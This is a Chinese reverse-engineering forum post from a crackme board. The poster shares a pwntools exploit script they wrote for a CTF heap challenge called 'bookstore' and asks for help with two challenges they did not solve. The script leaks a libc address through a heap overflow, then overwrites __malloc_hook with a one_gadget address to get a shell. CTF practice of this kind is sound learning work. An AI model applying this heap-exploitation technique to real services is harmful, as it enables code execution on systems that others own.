好友
阅读权限10
听众
最后登录1970-1-1
|
深_蓝
发表于 2018-12-12 19:45
CM是什么?Crackme是什么?这是什么东西?楼主发的什么?
他们都是一些公开给别人尝试破解的小程序,制作 Crackme 的人可能是程序员,想测试一下自己的软件保护技术,也可能是一位 Cracker,想挑战一下其它 Cracker 的破解实力,也可能是一些正在学习破解的人,自己编一些小程序给自己破解,KeyGenMe是要求别人做出它的 keygen (序号产生器), ReverseMe 要求别人把它的算法做出逆向分析, UnpackMe 是要求别人把它成功脱壳,本版块禁止回复非技术无关水贴。
本人才疏学浅,在赛场上研究只有一题做出来,剩下两题没做出来请大神指导指导
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# imports
from pwn import *
import time
import os
import sys
elf = ""
libc = ""
env = ""
LOCAL = 1
context.log_level = "debug"
p = process("./bookstore", env={"LD_PRELOAD":"/tmp/ironthree/book/libc_64.so"})
#p = remote("ip", port) #uncomment this.
p.recvuntil("choice:\n")
def add(name, length, book):
p.sendline("1")
p.recvuntil("name?\n")
p.send(name)
p.recvuntil("name?\n")
p.sendline(str(length))
p.recvuntil("book?\n")
p.send(book)
p.recvuntil("choice:\n")
def sell(idx):
p.sendline("2")
p.recvuntil("sell?\n")
p.sendline(str(idx))
p.recvuntil("choice:\n")
def read(idx):
p.sendline("3")
p.recvuntil("sell?\n")
p.sendline(str(idx))
data = p.recvuntil("choice:\n")
return data
add("1234567\n", 0, "a\n")
for i in range(4):
add("12345678\n", 0x50, "a\n")
add("aaaadddd\n", 0, "a\n") #7
add("bbbbcccc\n", 0x40, "a\n") #8
add("railser\n", 0, "b\n")
add("ddaa\n", 0x50, "b\n")
add("ddaa\n", 0x20, "b\n")
add("ddaa\n", 0x30, "b\n")
add("ddaa\n", 0x40, "b\n")
add("ddaa\n", 0x50, "b\n")
sell(0)
add("trytry\n", 0, "a" * 24 + p64(0xc1)+"\n") #overflow
sell(1)
add("a" * 16 + p64(0x6e)+"\n", 20, "x"*8+"\n")
data = read(1)
libc_addr = data.split("x"*8)[1][:6]
libc = u64(libc_addr + "\0\0") - 0x3c4c28
print hex(libc)
one = libc + 0x4526a
mallochook = libc + 0x3c4b10 - 0x10
target = libc + 0x3c4b38
#gogo
sell(5)
sell(6)
add("a"*30, 0, "a" * 24 + p64(0x51)+p64(0x6f)+"\n")
add("a"*30 ,0x40, "a\n")
sell(7)
sell(8)
add("a"*30, 0, "a"*24 + p64(0x61)+p64(target) + "\n")
add("a" * 30, 0x50, "a\n")
add("a"*30, 0x50, p64(0) * 6 + p64(mallochook) + "\n")
add("a"*30, 0x50, "a"*0x30+"\n")
add("a"*30, 0x50, p64(one) + "a"*0x30+"\n")
p.sendline("1")
p.sendline("xxxx")
p.sendline("30")
p.interactive()
|
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
[复制链接]
